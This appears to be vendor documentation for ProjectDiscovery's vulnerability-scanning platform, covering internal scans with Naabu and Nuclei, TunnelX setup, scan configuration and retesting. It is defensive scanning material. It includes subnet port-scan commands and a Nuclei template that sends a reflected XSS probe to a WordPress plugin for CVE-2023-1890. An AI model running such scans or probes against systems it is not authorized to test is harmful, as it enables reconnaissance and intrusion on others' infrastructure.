* **View All Scans**: Access a summary of all scans in your environment. Use categories like Vulnerabilities, Info, and Affected Assets to filter and refine your results.
* **Explore Individual Scans**: Click on a specific scan to view detailed results, including vulnerabilities, affected assets, and detection information. Use filters such as Status, Severity, and Host to navigate through the data. Example scan URL: `cloud.projectdiscovery.io/scans/`.
* **Review Vulnerabilities**: Expand each vulnerability to see complete details, including the templates used, assets affected, and detection information. You can also export vulnerabilities in various formats (JSON, CSV, PDF) and modify their status (e.g., false positives, closed).
* **Retest and Remediate**: Retest individual vulnerabilities to confirm fixes and review remediation recommendations provided for each issue.
* **Access Logs**: View scanning logs for detailed information on time, assets, detection templates, and match results. Logs also include error information to assist with troubleshooting. Access logs directly using the format: `/scans//logs`.
New to ProjectDiscovery? Start with [Asset Discovery](/cloud/assets/overview) to ensure comprehensive coverage of your external attack surface.
## Next Steps
* [Configure Asset Discovery](/cloud/assets/adding-assets)
* [Create Custom Templates](/cloud/editor/introduction)
* [View Integration Options](/cloud/integrations)
# Internal Network Vulnerability Scanning
Source: https://docs.projectdiscovery.io/cloud/scanning/internal-scan
Internal network security is critical yet often overlooked. Once attackers gain initial access through configuration drift, phishing, or compromised credentials, they can rapidly expand their foothold by exploiting internal vulnerabilities. This lateral movement can lead to devastating breaches, making internal vulnerability scanning as crucial as external assessments.
ProjectDiscovery offers two distinct approaches for internal network vulnerability scanning, each designed to fit different organizational needs while maintaining our core focus on exploitability and accurate detection.
Run Nuclei locally and upload results to PDCP. Ideal for teams with existing scanning workflows or specific network restrictions.
Use TunnelX for remote scan triggering through PDCP UI. Perfect for large networks and centralized security management.
Internal scanning helps identify misconfigurations, unpatched systems, and security gaps that could be exploited for lateral movement before attackers can leverage them.
## Port Discovery with Naabu
Before running vulnerability scans, it's recommended to first identify open ports in your internal network using [Naabu](https://github.com/projectdiscovery/naabu) - a fast and reliable port scanner. This ensures comprehensive vulnerability scanning coverage.
```bash
# Scan entire internal subnet and save results
naabu -host 192.168.1.1/24 -o internal_ports.txt
# Scan specific port ranges
naabu -host 192.168.1.1/24 -p 80,443,8000-9000 -o internal_ports.txt
# Faster scanning with increased rate
naabu -host 192.168.1.1/24 -rate 1000 -o internal_ports.txt
```
The discovered ports can be used as input for vulnerability scanning to ensure thorough coverage of all exposed services. Learn more about Naabu's capabilities in our [detailed documentation](/tools/naabu/overview).
Naabu will soon be integrated directly into ProjectDiscovery's internal vulnerability scanning capabilities. Contact our [sales team](https://projectdiscovery.io/request-demo) to be notified when this feature becomes available.
## Method 1: Local Scanning & Upload
This approach lets you run Nuclei locally and upload results to ProjectDiscovery Cloud Platform (ProjectDiscovery).
### Set up your API Key
To connect your existing Nuclei results to PDCP you will need to create a free API Key:
1. Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io)
2. Open the setting menu from the top right and select "API Key" to create your API Key
3. Use the `nuclei -auth` command, and enter your API key when prompted.
### Configure Team (Optional)
If you want to upload the scan results to a team workspace instead of your personal workspace, you can configure the Team ID using either method:
* **Obtain Team ID:**
* Navigate to [https://cloud.projectdiscovery.io/settings/team](https://cloud.projectdiscovery.io/settings/team)
* Copy the Team ID from the top right section
* **CLI Option:**
```bash
nuclei -tid XXXXXX -cloud-upload
```
* **ENV Variable:**
```bash
export PDCP_TEAM_ID=XXXXX
```
2. Run your scan with the upload flag:
```bash
# Single target
nuclei -u http://internal-target -cloud-upload
# Multiple targets
nuclei -l internal-hosts.txt -cloud-upload
# With specific templates
nuclei -u http://internal-target -t misconfiguration/ -cloud-upload
```
This method is ideal when you want to maintain complete control over scan execution or integrate with existing automation scripts.
## Method 2: Cloud-Managed Scanning (Recommended)
[TunnelX](https://github.com/projectdiscovery/tunnelx) is our open-source tunneling solution, purpose-built by ProjectDiscovery to enable secure internal scanning. It establishes isolated SOCKS5 proxies that let you trigger scans directly from the ProjectDiscovery interface while ensuring your internal infrastructure remains protected and unexposed.
Cloud-managed internal scanning with TunnelX is an Enterprise-exclusive feature. Free and Pro users can still perform internal scans using the local scanning method described above.
**System Requirements**\
TunnelX is designed to be lightweight and efficient. Minimum recommended specifications for optimal performance:
* **CPU:** 1 vCPU/Core
* **Memory:** 2GB RAM
* **Network:** 100Mbps network interface
* **Storage:** 10GB available disk space
* **Operating System:** Linux (recommended), macOS, or Windows
These specifications are suitable for most deployment scenarios. A basic VPS (Virtual Private Server) meeting these requirements is sufficient for running TunnelX efficiently.
### Install TunnelX
Choose your preferred installation method:
```bash Docker (Recommended)
# Pull and run the official image
docker run --network host -d \
-e PDCP_API_KEY="your_api_key" \
projectdiscovery/tunnelx:latest
# Or build locally
docker build -t tunnelx https://github.com/projectdiscovery/tunnelx.git
docker run --network host -d -e PDCP_API_KEY="your_api_key" tunnelx
```
```bash Go Installation
# Install using go install
go install github.com/projectdiscovery/tunnelx@latest
# Set your API key and run
export PDCP_API_KEY="your_api_key"
tunnelx
```
```bash Source
# Clone and run from source
git clone https://github.com/projectdiscovery/tunnelx.git
cd tunnelx
export PDCP_API_KEY="your_api_key"
go run .
```
# ProjectDiscovery Vulnerability Scanning Overview
Source: https://docs.projectdiscovery.io/cloud/scanning/overview
ProjectDiscovery's vulnerability scanning platform combines an attacker's mindset with powerful automation to uncover real security issues across your environment. It focuses on **exploitability**, meaning that identified vulnerabilities aren't just theoretical – they are validated through actual exploitation attempts. This approach contrasts with traditional scanners that often rely on version checks or CVE databases and can overwhelm teams with false positives. By leveraging the open-source **Nuclei** engine and its extensive template library, ProjectDiscovery delivers precise, actionable insights tailored to your assets, with far less noise and more relevant findings for your security and engineering teams.
## Attacker's Mindset vs Traditional Scanners
Traditional vulnerability scanners tend to focus on known vulnerabilities by matching software versions to CVE entries or using simple signature checks. This method can miss configuration issues and often flags vulnerabilities that *might* exist without proving exploitability. In contrast, ProjectDiscovery's platform takes an attacker's perspective from the start:
* **Active Exploitation Testing:** Instead of assuming a system is vulnerable because of its version, ProjectDiscovery actually attempts to exploit the issue (in a safe manner) to confirm the vulnerability is real. This dramatically reduces false positives because only genuine, exploitable weaknesses are reported. Security teams can trust that each finding is a true risk, not just a guessed one.
* **Beyond Just CVEs:** Attackers look for any weakness, not just known CVEs. Likewise, ProjectDiscovery detects misconfigurations and security gaps that traditional scanners often miss. For example, it can catch an open S3 bucket or an enabled default password – issues that might not have a CVE ID but are severe if left unchecked. This broad coverage ensures you find not only publicly known vulnerabilities but also the often-overlooked flaws in your systems.
* **Proof-of-Concept Evidence:** Each vulnerability comes with evidence and details to prove its impact. The platform provides clear proof-of-concept (PoC) data – such as specific response output or payload confirmation – for every finding. This means when engineers receive a report, they also get the context needed to understand and reproduce the issue, making remediation much more straightforward.
* **Customization and Community-Powered Testing:** Unlike many closed-box scanners, ProjectDiscovery is highly customizable. It uses Nuclei's YAML-based templates, allowing security teams to write **custom vulnerability checks** for edge-case issues or business logic flaws unique to your environment. In addition, the platform is fueled by a global community of researchers and engineers contributing over 9,000 templates covering the latest CVEs and emerging threats. This community-powered model means the scanner is always up-to-date with newly discovered exploits and "zero-day" attack techniques, keeping you one step ahead of attackers.
By adopting an attacker's mindset in its design, ProjectDiscovery effectively bridges the gap between **security** and **engineering** needs. Security professionals get the depth and coverage to find complex vulnerabilities, while engineers get high-fidelity results with concrete evidence, making it clear **why** an issue matters and how to fix it.
## Comprehensive Vulnerability Coverage
One of the core strengths of ProjectDiscovery's scanning is the **breadth of vulnerabilities and issues** it can detect. Through Nuclei's extensive template library, the platform scans for a wide range of vulnerability types across web applications, networks, cloud infrastructure, and more. Below are the key categories of findings it covers:
* **Known CVEs (Common Vulnerabilities and Exposures):** Leverage an up-to-date repository of templates to catch systems vulnerable to high-profile CVEs. This includes everything from critical remote code execution bugs to widely exploited vulnerabilities in popular software. The platform's community-driven template library tracks the latest disclosed CVEs and trending threats, so you can quickly identify if an asset is affected by a known issue soon after it's disclosed.
* **Web Application Flaws:** Identify common web app vulnerabilities – such as SQL injection, Cross-Site Scripting (XSS), insecure authentication, and other OWASP Top 10 issues – using an active library of community-powered templates. The scanner can crawl and probe your web applications to find weaknesses in forms, APIs, and sessions that attackers could exploit.
* **Misconfigurations:** Uncover security misconfigurations in software and services that could lead to breaches. This covers a broad set of issues like default or weak credentials, directory listing enabled on servers, misconfigured TLS/SSL settings, and other setup mistakes. ProjectDiscovery goes beyond simple CVE checks to catch these exploitable misconfigurations and security gaps that might not be tracked in any CVE database. By finding these, the platform helps you close holes that attackers commonly look for when scanning targets.
* **Exposed Services & Open Ports:** Discover services running that shouldn't be publicly accessible or are improperly secured. The scanner can enumerate open ports and test services like SSH, FTP, SMB, databases, and more for weaknesses. For example, it can detect an open database with no firewall, or an SSH service using a default password. Identifying exposed services is crucial for understanding your attack surface and eliminating unintended entry points.
* **Cloud Infrastructure Issues:** Assess your cloud environments (AWS, GCP, Azure, and others) for misconfigured resources and exposed assets. ProjectDiscovery's templates include checks for things like open cloud storage buckets, publicly readable database snapshots, overly permissive IAM roles, and other cloud-specific misconfigurations. These checks ensure your cloud configurations follow best practices and that no cloud service is unknowingly exposing data or services to the internet.
* **Custom and Emerging Threats:** Create and run **custom security tests** specific to your applications and infrastructure. If your organization has a unique in-house application or a non-standard protocol, you can write your own Nuclei templates to scan for vulnerabilities in those systems. This flexibility means you're not limited to known issues – you can continuously expand scanning to cover new threat scenarios or internal policies. Additionally, the platform's AI-assisted template generation can help turn pentest findings or bug bounty reports into new automated checks quickly, enabling you to adapt rapidly to emerging threats.
By covering everything from well-known CVEs to configuration slip-ups, ProjectDiscovery ensures comprehensive coverage of your security posture. Both security teams and developers can appreciate this breadth: security teams know that even obscure vectors are being checked, and developers get peace of mind that common mistakes (like an open admin interface or default config) won't slip through unnoticed.
## Scalability and Cloud-Native Integration
ProjectDiscovery Cloud is built to **scale** your vulnerability scanning efforts across many assets without the headache of managing infrastructure. Using the Nuclei engine under the hood, the platform can scan thousands of hosts concurrently, enabling enterprise-grade performance for large environments. In practical terms, this means you can run thorough scans on large asset inventories in a fraction of the time traditional tools require. For example, ProjectDiscovery's cloud scanning can operate up to 50× faster than standard open-source scanning on a single machine, handling hundreds of targets in parallel and making it feasible to regularly scan extensive networks or cloud environments.
Several features make the scanning process both high-performance and low-effort:
* **Automated Asset Discovery Integration:** The platform ties in with asset discovery data to ensure no asset goes unscanned. Newly discovered external assets are automatically queued for scanning, and similarly, if new Nuclei templates are released by the community, the platform can trigger scans on relevant assets. This automation means your security assessments stay up-to-date with the latest threats and changes in your environment *without* constant manual intervention.
* **Cloud-Native Efficiency:** All scanning is performed in the cloud, leveraging ProjectDiscovery's optimized infrastructure. You don't need to provision servers or juggle scanner installations – the heavy lifting is managed for you. This not only provides speed, but also consistency: every scan uses the latest engine and templates, ensuring uniform results. Enterprise users can even customize scan rates and IP whitelisting settings to fit their environment's capacity and compliance needs.
* **Multi-Protocol and Multi-Vector Support:** Nuclei (and by extension ProjectDiscovery) isn't limited to web HTTP checks. It supports over 6 different protocols (HTTP(S), TCP, DNS, SMB, etc.) as well as specialized code-based checks. This means the scanner can validate vulnerabilities whether they exist in web endpoints, network services, or even within misconfigured files and code. From web pages to network ports, the platform can stitch together complex exploit scenarios across different layers, simulating how a real attacker might chain multiple weaknesses.
* **High Accuracy through Template Validation:** Each Nuclei template includes specific **match conditions** that must be met for a vulnerability to be reported, greatly increasing accuracy. For instance, a template might check that a certain response header or message content exists only if an exploit was successful. This approach, combined with the exploit attempt itself, yields high-confidence results. According to ProjectDiscovery, the Nuclei-powered scans focus on vulnerabilities that "have real-world impact rather than just relying on CVSS scores". In other words, the scanner prioritizes issues that genuinely matter, so teams aren't chasing informational or low-impact findings at the cost of more critical ones.
By scaling horizontally and using intelligent automation, ProjectDiscovery Cloud ensures that even as your asset inventory grows or new threats emerge, you can maintain a fast and effective scanning routine. This scalability is crucial for engineering teams who need to incorporate security checks into large, dynamic environments without slowing down development or operations.
## Continuous Retesting and Workflow Integration
Finding vulnerabilities is only part of the challenge – making sure they get fixed and stay fixed is equally important. ProjectDiscovery addresses this through features that integrate with your remediation workflow and enable ongoing retesting of issues:
* **One-Click Vulnerability Retesting:** Once a developer believes a vulnerability is fixed, security teams can quickly verify it using the platform's retesting feature. Rather than running a full scan again, you can target just the specific vulnerability on the affected asset. The platform will rerun the exact check (template) and confirm whether the issue still exists. This ad-hoc validation is much faster than a complete rescan and provides immediate feedback. If the retest shows the vulnerability is resolved, the finding's status is automatically updated to "Fixed" in the platform. If not, it remains open, indicating further work is needed. This capability saves time for both engineers and security analysts, closing the loop between finding a bug and verifying the remediation.
* **Regression Testing (Preventing Recurrence):** ProjectDiscovery can **continuously monitor previously fixed vulnerabilities** to ensure they don't resurface. It essentially remembers vulnerabilities that were marked as fixed and periodically or upon changes retests them. This guards against regressions – for example, if a code change or configuration rollback accidentally re-introduces an old flaw, the platform will catch it. By preventing the recurrence of known issues, you maintain security improvements over the long term instead of fixing the same problems repeatedly.
* **Integration with Ticketing Systems:** The platform was designed to slot into existing engineering workflows. It can automatically create tickets in systems like Jira when new vulnerabilities are found, ensuring that developers get notified through the tools they already use. Each ticket can include the vulnerability details and proof-of-concept evidence, so engineers have what they need to start fixing the issue. Moreover, as mentioned, once a fix is deployed, the retesting feature can be triggered directly from the ticketing workflow (for example, via an API or integration) to verify the fix, and then update the ticket status. ProjectDiscovery's integration capabilities extend to alerting and messaging platforms as well – you can receive notifications on Slack, Microsoft Teams, or via custom webhooks, but the key value is that it **streamlines vulnerability management into your normal development process**. Security and DevOps teams don't have to juggle separate systems; everything from discovery to fix verification can be tracked in one cohesive flow.
* **Multi-Status Tracking and Reporting:** In addition to opening tickets, the platform supports multiple status designations (Open, In Progress, Fixed, Reopened, etc.) for each finding and keeps an audit trail. This makes it easy for both security and engineering teams to see the lifecycle of a vulnerability: when it was found, who is addressing it, and whether it has been confirmed resolved. Progress can be monitored via the web dashboard or pulled via API for custom reporting. Engineering managers and security leads can use this to ensure nothing falls through the cracks and to gather metrics (like how long it takes to remediate issues on average).
By integrating retesting and tracking into existing workflows, ProjectDiscovery removes much of the friction that typically comes with vulnerability management. **Engineering teams new to vulnerability scanning will find this approach approachable**, as it ties into familiar tools (like issue trackers) and provides clear "evidence-based" tasks to work on. At the same time, **security professionals get the assurance** that fixes are being validated and that the organization's risk is continuously being re-evaluated as things change. It's a win-win: developers can fix issues with confidence and verify their work easily, and security teams can enforce remediation and catch regressions without manual effort.
## Delivering Value to Security and Engineering Teams
ProjectDiscovery's vulnerability scanning platform is engineered to provide value across the board – from seasoned security analysts to software engineers who might be less familiar with security tooling:
* **For Security Teams:** It offers depth and confidence. The wide vulnerability coverage means security analysts can uncover both common and esoteric issues (from CVEs to cloud misconfigs) in one platform. The attacker-centric approach and exploit validation ensure that when they raise an issue, it's backed by solid evidence, reducing debates over "is this a false positive?". The ability to customize scans via templates or integrate new exploits quickly means the security team can adapt the tool to their organization's threat model. In short, it reduces the time spent triaging noise and lets analysts focus on true threats, with the peace of mind that the findings are real.
* **For Engineering Teams:** It emphasizes clarity and workflow fit. Developers get vulnerability reports with concrete proof and even steps to reproduce, which demystifies the findings and makes them actionable. The integration with ticketing systems and the straightforward retest mechanism fold neatly into the development lifecycle – fixing and validating a security bug becomes as seamless as closing any other bug ticket. Because the scanner finds misconfigurations and practical security issues (not just CVE IDs), it often catches problems that relate to operational practices (like an open port or a weak configuration), which engineering teams are well positioned to fix quickly once identified. And since the results are high-fidelity, engineers aren't wasting time chasing ghosts or tweaking scan settings – they can trust the results and focus on remediation.
In summary, ProjectDiscovery's platform brings **clarity, depth, and efficiency** to vulnerability scanning. By thinking like an attacker and blending community-driven intelligence with enterprise features, it ensures that both security and engineering teams can collaboratively improve the organization's security posture. The security team benefits from a powerful tool that surfaces real risks with evidence, and the engineering team benefits from clear guidance and integration into their normal workflows. This hybrid of robust technical capability and ease-of-use is what makes ProjectDiscovery's vulnerability scanning stand out from traditional scanners that simply enumerate issues. It transforms vulnerability management from a cumbersome, noisy process into a streamlined, attacker-focused practice of finding and fixing the issues that truly matter.
Ultimately, ProjectDiscovery delivers a vulnerability scanning solution that not only **finds more relevant issues** across your applications, networks, and cloud, but also helps you **fix them faster** and **prevent them from coming back** – a value proposition that both security specialists and engineers can appreciate.
# Scan & Template Configurations
Source: https://docs.projectdiscovery.io/cloud/scanning/parameters
Configure custom scan settings, HTTP headers, template variables, and template profiles
## Overview
ProjectDiscovery's scanning engine supports various configuration options to customize scan behavior and template execution. This includes HTTP headers, template variables, interactsh settings, and template profiles. Some templates, particularly those requiring authentication or specific parameters, need additional configuration to work effectively in the cloud platform.
## Scan Configurations
### HTTP Headers
Configure custom HTTP headers that will be included in all scan requests. This is useful for:
* Adding authentication tokens
* Setting specific User-Agent strings
* Including custom tracking headers
* Passing required API keys
### Template Variables
Define variables that templates can reference during execution. Common use cases include:
* Authentication credentials
* API tokens
* Custom parameters
* Environment-specific values
### Interactsh Settings
Configure out-of-band (OOB) testing parameters:
* Custom Interactsh server settings
* Correlation timeout values
* Callback configurations
## Authentication Example
Let's look at a practical example using WordPress authentication, which is required by over 150 different Nuclei templates.
Here's a template that requires authentication parameters:
```yaml
id: CVE-2023-1890
info:
name: Tablesome < 1.0.9 - Cross-Site Scripting
severity: medium
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1
Host: {{Hostname}}
```
This template uses two undefined variables (`{{username}}` and `{{password}}`). While in CLI you would use:
```bash
nuclei -id CVE-2023-1890 -var username=admin -var password=password123 -target https://example.com
```
In ProjectDiscovery Cloud, we need to configure these through the scan configuration interface.
## Setting Up Scan Configurations
### Creating a New Configuration
1. Navigate to Scans → Configurations
2. Select "Scan Options"
3. Click "New Config"
1. Enter a descriptive name (e.g., "WP Authentication")
2. Choose configuration type:
* HTTP Headers
* Template Variables
* Interactsh Settings
For template variables:
* Add key-value pairs (e.g., username: admin)
* Set scope (global or template-specific)
* Configure visibility settings
For HTTP headers:
* Specify header name and value
* Set application conditions
1. Choose when to apply this configuration:
* Enable for all scans (global)
* Manual selection per scan
2. Set template matching criteria (optional)
### Template Profiles
Create custom template collections based on:
* Severity levels (Critical, High, Medium, Low)
* Tags (wordpress, cve2023, authenticated, etc.)
* Protocol types (HTTP, DNS, TCP, etc.)
* Template IDs
To create a template profile:
1. Navigate to Scans → Configurations → Template Profiles
2. Click "New Profile"
3. Select filtering criteria
4. Save and name your profile
## Advanced Configuration Examples
### WordPress Authentication
```yaml
name: "WordPress Auth"
type: template_variables
variables:
username: "admin"
password: "secure_password"
scope: "wordpress,wp-plugin"
```
### Custom Headers
```yaml
name: "API Authentication"
type: http_headers
headers:
Authorization: "Bearer {{token}}"
X-Custom-Header: "value"
```
### Interactsh Configuration
```yaml
name: "Custom OOB Settings"
type: interactsh
settings:
server: "custom.interactsh.com"
token: "your_token"
correlation_timeout: 30
```
## Best Practices
1. **Security Considerations**
* Use environment variables for sensitive values
* Implement least-privilege access
* Regularly rotate credentials
* Audit configuration usage
2. **Performance Optimization**
* Group related configurations
* Use template-specific variables when possible
* Monitor configuration impact on scan times
3. **Maintenance**
* Document configuration purposes
* Review and update regularly
* Remove unused configurations
* Test changes before production use
When using authentication credentials or sensitive parameters, ensure they are stored securely and accessed only by authorized users. Consider using environment variables or secure credential storage for sensitive values.
## What's Next?
After setting up configurations:
1. Create new scans using your configurations
2. Monitor scan results for proper parameter usage
3. Adjust configurations based on results
4. Create template profiles for specific use cases
For template development guidance, visit our [Template Editor](/cloud/editor/overview) documentation.
# Real-Time Autoscan for Trending Exploits
Source: https://docs.projectdiscovery.io/cloud/scanning/real-time-scans
Real-time scanning keeps your infrastructure protected against emerging threats by instantly scanning your assets when new Nuclei templates added to ProjectDiscovery. These threats may range from zero-days and 1-day exploits to newly disclosed CVEs being actively exploited in the wild.
Security researchers and engineers worldwide contribute Nuclei templates as soon as new vulnerabilities trend on the internet, often within hours of disclosure. When these templates are merged into our repository, your assets are automatically scanned without waiting for scheduled runs. This rapid response is crucial for protecting against active exploitation campaigns, especially during the critical window between vulnerability disclosure and patch availability.
Think of it as a security-focused CI pipeline – continuously monitoring, automatically triggering, and instantly protecting your infrastructure against emerging threats.
## Setup and Configuration Options
### Setting Up Real-Time Scans
![](https://mintlify.s3.us-west-1.amazonaws.com/projectdiscovery/image.png)
All Enterprise accounts are automatically enrolled in Real-time Autoscan. To check if Real-time Autoscan is enabled for your account:
1. Visit the [ProjectDiscovery Cloud Dashboard](https://cloud.projectdiscovery.io/)
2. Navigate to the Real-Time Scanning section directly from the dashboard home
3. Check if "Real-time Autoscan" is toggled on
### Custom Asset Selection
![Real-time scanning configuration options](https://mintlify.s3.us-west-1.amazonaws.com/projectdiscovery/images/real-time-scans-config.png)
By default, every asset added to ProjectDiscovery will be automatically scanned when new Nuclei templates are released.
Real-time Autoscan can also be configured to scan a subset of your assets by taking the following steps:
1. Visit the [ProjectDiscovery Cloud Dashboard](https://cloud.projectdiscovery.io/)
2. Navigate to the Real-Time Scanning section directly from the dashboard home
3. Click on the gear icon next to the toggle
4. Select **Custom Assets**
5. Select the asset groups you wish to include in Real-time Autoscan
6. Click on **Update**
## Reviewing Scan Results
![](https://mintlify.s3.us-west-1.amazonaws.com/projectdiscovery/Screenshot2025-01-09at3.31.10PM.png)
Real-time Autoscan results are grouped as a separate scan titled **"Early Templates Autoscan"** under the **Scans** tab. This scan updates automatically whenever a new Nuclei template is merged, scanning your assets with the latest template.
Detected vulnerabilities will appear as open results within the scan. These results will remain open even if the scan is later updated with a newly merged Nuclei template.
To view the most recent template used in the scan:
1. Click the three dots menu to the right of the scan.
2. Select **Update**
3. Click on the tab **Set templates**.
4. Expand the folder labeled **"Early Templates"**.
## Alerting
![](https://mintlify.s3.us-west-1.amazonaws.com/projectdiscovery/Screenshot2025-01-09at3.57.03PM.png)
By default, only newly detected vulnerabilities will generate email or message alert. However, on occasion, we may merge a trending exploit that warrants a notification even if no vulnerable hosts are detected. This message can be shared internally to proactively communicate a strong security posture with relevant stakeholders and leadership personnel.
Real-time scanning is a feature available with our Enterprise plan.
# Retesting Vulnerabilities
Source: https://docs.projectdiscovery.io/cloud/scanning/retesting
Quickly verify the current status of vulnerabilities through targeted retesting
Retesting allows you to quickly verify the current status of a vulnerability, confirming whether it has been remediated or remains active. This feature is designed for ad-hoc validation of findings, eliminating the need to run full scans repeatedly.
When you initiate a retest, you'll be presented with a confirmation dialog:
The retest scan will automatically verify if the vulnerability has been resolved. If fixed, the report status will automatically update to "Fixed". Otherwise, it will revert to its original status.
## Supported Scenarios
### External Vulnerabilities
* Direct retesting of vulnerabilities on externally accessible assets
* No additional configuration required
* Immediate validation of remediation status
### Internal Vulnerabilities
The platform supports retesting of internal vulnerabilities in two scenarios:
1. **Cloud Platform Internal Scans**
* Results from scans executed through the cloud platform
* Requires selection of an internal proxy for retesting
* Maintains consistent access to internal targets
2. **Uploaded Local Scan Results**
* Support for results from locally executed scans
* Requires proxy host with access to the original internal targets
* Seamless integration with existing internal scanning workflows
To set up internal scanning capabilities and configure proxies, refer to our [Internal Network Scanning](/cloud/scanning/internal-scan) guide. This covers both TunnelX setup for cloud-managed scanning and local scanning configurations.
For internal vulnerabilities, you'll need a properly configured proxy. You can either:
* Use TunnelX for cloud-managed scanning (recommended for Enterprise users)
* Set up local scanning with result uploads
Learn more in our [Internal Scanning guide](/cloud/scanning/internal-scan).
# Getting Help
Source: https://docs.projectdiscovery.io/help/home
Review your options for getting help from ProjectDiscovery
Need assistance or guidance? You're in the right place, and we're here to help!
#
Source: https://docs.projectdiscovery.io/home
ProjectDiscovery Documentation
{/* Hero Section */}
Security at Scale
Tap into the Future of Security Workflows
Learn and read all about our open-source technologies, cloud platform, and APIs
Get started
{/* First Set of Cards */}
Map your internet-exposed assets and understand your attack surface.
Create and automate custom security templates to detect vulnerabilities at scale.
Stay updated with trending vulnerabilities and security exploits in real-time.
For Organizations
{/* Second Set of Cards */}
Scale your security operations with our cloud platform and advanced automation.
Connect and monitor AWS, GCP, Cloudflare, and Azure accounts for security vulnerabilities.
Integrate with your existing ticketing and alerting tools.
{/* Third Set of Cards */}
Build and automate custom security workflows using our comprehensive REST APIs.
Secure internal networks with automated vulnerability assessment and monitoring.
Configure SAML SSO, IP whitelisting, custom headers, and more for your organization.
{/* Expert Contact Card */}
Get personalized guidance on implementing security workflows for your organization. Our team is ready to help you scale your security operations.
# ProjectDiscovery Quick Start Guide
Source: https://docs.projectdiscovery.io/quickstart/index
Get started with ProjectDiscovery for asset discovery, vulnerability scanning, and exposure monitoring
ProjectDiscovery helps security and engineering teams continuously monitor and secure what they deploy on the internet. Modern development moves fast, and it's easy to unknowingly expose assets—whether it's an open port (e.g., 9092) assumed to be internal or a cloud resource left publicly accessible. Our platform automates discovery, providing real-time visibility into your internet-facing infrastructure, so you know exactly what's exposed before attackers do.
Beyond discovery, ProjectDiscovery actively identifies and verifies exploitable vulnerabilities across your attack surface. Using real-world attack techniques, we simulate how adversaries find and exploit security gaps—but in a controlled, safe manner. This eliminates false positives and helps teams focus on actual risks. The platform is fully customizable, allowing you to extend detection with your own security rules, tailored to findings from pen tests, bug bounties, or internal policies.
Backed by battle-tested open-source security tools used by over 100,000 professionals, ProjectDiscovery combines real-world attack detection with comprehensive vulnerability management. While traditional tools rely on CVE databases and version checks, we take an attacker's perspective—helping organizations understand, prioritize, and secure their most critical exposures in real time.
## Real-World Impact of Security Exposures
Recent high-profile breaches demonstrate why continuous security monitoring is crucial:
* **Capital One (2019)**: Attackers exploited a misconfigured web application firewall and SSRF vulnerability to access an exposed AWS S3 bucket, stealing sensitive customer data.
* **Uber (2016/2017)**: Hackers discovered cloud access credentials accidentally committed in a GitHub repository, using them to access AWS and extract millions of user and driver records.
* **Equifax (2017)**: An unpatched Apache Struts vulnerability (CVE-2017-5638) in a public-facing web application allowed remote code execution, compromising personal data of around 143 million people.
* **Colonial Pipeline (2021)**: A legacy VPN account without multi-factor authentication was exploited using stolen credentials, granting attackers access to the network and triggering a ransomware attack.
* **Panera Bread (2018)**: An unsecured API endpoint exposed customer data in plain text, enabling attackers to enumerate records via sequential IDs and scrape millions of user profiles.
These incidents highlight why organizations need robust security monitoring and vulnerability management. ProjectDiscovery's platform helps prevent such breaches by continuously monitoring your attack surface and validating security controls.
## Platform Overview
**ProjectDiscovery** is a security platform that combines powerful **open-source tools** with a **cloud-based service** to help you secure your infrastructure. It offers a hybrid approach where you can use a user-friendly cloud interface or command-line tools (CLI) – or both – to suit your workflow. With ProjectDiscovery, you can:
* **Discover your assets** – Identify all your external-facing systems, domains, cloud resources, and more
* **Scan for vulnerabilities** – Use automated, up-to-date vulnerability checks to find exploitable issues
* **Monitor exposures continuously** – Keep an eye on your external and internal risks in real-time
* **Automate security tasks** – Integrate with APIs and workflows to alert your team when issues are found
Whether you're a beginner or a seasoned security professional, ProjectDiscovery's Cloud platform and CLI tools work together to provide immediate insights into your attack surface. The following guide will walk you through essential workflows on **both Cloud and CLI**, so you can quickly see value in using ProjectDiscovery for real-world security use cases.
Get started with our cloud platform for instant asset discovery and continuous monitoring
Explore our powerful CLI tools for security testing and automation
New to ProjectDiscovery? [Sign up for free](https://cloud.projectdiscovery.io) to start securing your infrastructure.
## Quick Navigation
Learn how to discover and manage your external attack surface
Set up automated vulnerability scanning and continuous monitoring
Create custom security checks using our template framework
Connect cloud providers and third-party services
## Getting Started with Cloud
ProjectDiscovery Cloud makes it easy to discover and scan assets without managing any infrastructure. Follow these steps to get started quickly:
1. **Sign Up and Log In:** Create a free account on the ProjectDiscovery Cloud platform (go to **cloud.projectdiscovery.io** and sign up). After verifying your email, log in to access the Cloud dashboard.
2. **Add Your Assets:** Once in the dashboard, start your asset discovery by adding a **root domain** or organization name. For example, add **`yourcompany.com`** as a root domain. The platform will automatically enumerate subdomains, IP addresses, and related assets linked to that domain. You can add up to a certain number of domains for free — e.g. your company's main domains. ProjectDiscovery will use its scanners behind the scenes to give you an instant inventory of your external assets.
3. **Initiate a Vulnerability Scan:** After your assets are discovered, launch an automated vulnerability scan in the cloud platform. You can navigate to the **Scans** section, select your asset or asset group, and start a **Nuclei scan** (Nuclei is the engine that runs vulnerability templates). Use the default template set to scan for a wide range of common issues. The scan runs in the cloud, testing your assets for exploitable vulnerabilities (like misconfigurations, outdated software, and known CVEs).
4. **Continuous Monitoring:** ProjectDiscovery Cloud will **continuously monitor** your assets without further input. This means if a new subdomain appears tomorrow or a new critical vulnerability emerges in the template feed, the platform can automatically discover and scan it. You can also schedule regular scans (e.g. daily or weekly) for ongoing coverage. Essentially, once your assets are added, the cloud platform keeps an eye on them and updates findings in real-time.
5. **Review Findings and Alerts:** Check the **Dashboard** or **Reports** section to review the results. You'll see any vulnerabilities found, categorized by severity, with details for each finding. For example, if an exposed admin panel or a known CVE was detected, it will be listed with information on the affected asset. From here, you can prioritize what to fix first. ProjectDiscovery Cloud also lets you set up real-time alerts – for instance, you can configure notifications via Email, Slack, or Microsoft Teams to be alerted the moment a high-severity issue is discovered. This ensures your team is notified immediately about critical risks.
**Key Cloud Features:** *Instant asset discovery, automated scanning, and continuous monitoring* are built-in. As soon as you add a domain, the platform gives you quick visibility into your tech stack (domains, cloud instances, etc.). It continuously scans for **exploitable vulnerabilities** using the latest community-driven templates, so you're always up-to-date on emerging threats. All of this happens with no infrastructure for you to manage – the Cloud platform handles the heavy lifting while you get actionable results.
## Getting Started with CLI
If you prefer working in a terminal or want to integrate scans into your own environment, ProjectDiscovery's CLI tools are for you. This section will help you install the essential tools and run basic scans for asset discovery and security testing.
